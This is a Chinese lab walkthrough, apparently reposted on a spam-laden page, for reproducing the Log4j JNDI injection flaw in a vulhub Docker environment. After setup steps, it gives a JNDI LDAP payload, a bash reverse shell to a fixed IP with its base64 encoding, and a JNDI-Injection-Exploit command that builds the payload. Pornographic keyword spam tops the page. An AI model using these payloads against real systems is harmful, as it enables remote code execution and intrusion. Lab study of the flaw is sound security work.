欧美free性护士vide0shd,老熟女,一区二区三区,久久久久夜夜夜精品国产,久久久久久综合网天天,欧美成人护士h版

首頁綜合 正文
目錄

柚子快報邀請碼778899分享:log4j反序列化

柚子快報邀請碼778899分享:log4j反序列化

http://yzkb.51969.com/

1.環(huán)境搭建

一臺kali(靶機) 一臺win(攻擊機)

這里kali進行換源

# 官方源 # deb http://http.kali.org/kali kali-rolling main non-free contrib # deb-src http://http.kali.org/kali kali-rolling main non-free contrib #根據(jù)需要自己選一個,中科大的還可以 #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib #阿里云 #deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib #deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib #清華大學(xué) #deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free #deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free #浙大 #deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free #deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free #東軟大學(xué) #deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib #deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib #重慶大學(xué) #deb http://http.kali.org/kali kali-rolling main non-free contrib #deb-src http://http.kali.org/kali kali-rolling main non-free contrib

?進入/etc/apt目錄 編輯sources.list文件命令如下

sudo vim sources.list

?將原有的源注釋,添加其他源,這里用的是阿里的

?隨后進行更新

apt-get update 更新索引

apt-get upgrade 更新軟件

apt-get dist-upgrade 升級

apt-get clean 刪除緩存包

apt-get autoclean 刪除未安裝的deb包 普通用戶記得在命令前接上sudo

kali機安裝docker命令如下

?sudo apt install docker.io root用戶不用加sudo

?安裝docker-compose

sudo apt-get install docker-compose

安裝靶場vulhub

git clone https://github.com/vulhub/vulhub.git

?啟動靶場環(huán)境

進入靶場 cd /vulhub/log4j/你所想打的對應(yīng)版本 啟動 docker-compose up -d 查看容器開放端口 docker ps 訪問靶場,ip加端口訪問

?漏洞復(fù)現(xiàn)

?將以下代碼放入url

admin/cores?action=${jndi:ldap://uhd50l.dnslog.cn}

下載工具 JNDI-Injection-Exploit

?Release JNDI-Injection-Exploit v1.0 · welk1n/JNDI-Injection-Exploit · GitHub

?構(gòu)建反彈shell要經(jīng)過base64編碼

原碼 bash -i >& /dev/tcp/192.168.0.33/4443 0>&1 編碼后 YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMzkvNDQ0MyAwPiYx

利用JNDI-Injection-Exploit v1.0生成payload

?java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMzMvNDQ0MyAwPiYx}|{base64,-d}|{bash,- i}" -A 192.168.0.33

?

?發(fā)包

柚子快報邀請碼778899分享:log4j反序列化

http://yzkb.51969.com/

參考鏈接

評論可見,查看隱藏內(nèi)容

本文內(nèi)容根據(jù)網(wǎng)絡(luò)資料整理,出于傳遞更多信息之目的,不代表金鑰匙跨境贊同其觀點和立場。

轉(zhuǎn)載請注明,如有侵權(quán),聯(lián)系刪除。

本文鏈接:http://m.gantiao.com.cn/post/19027667.html

發(fā)布評論

您暫未設(shè)置收款碼

請在主題配置——文章設(shè)置里上傳

掃描二維碼手機訪問

文章目錄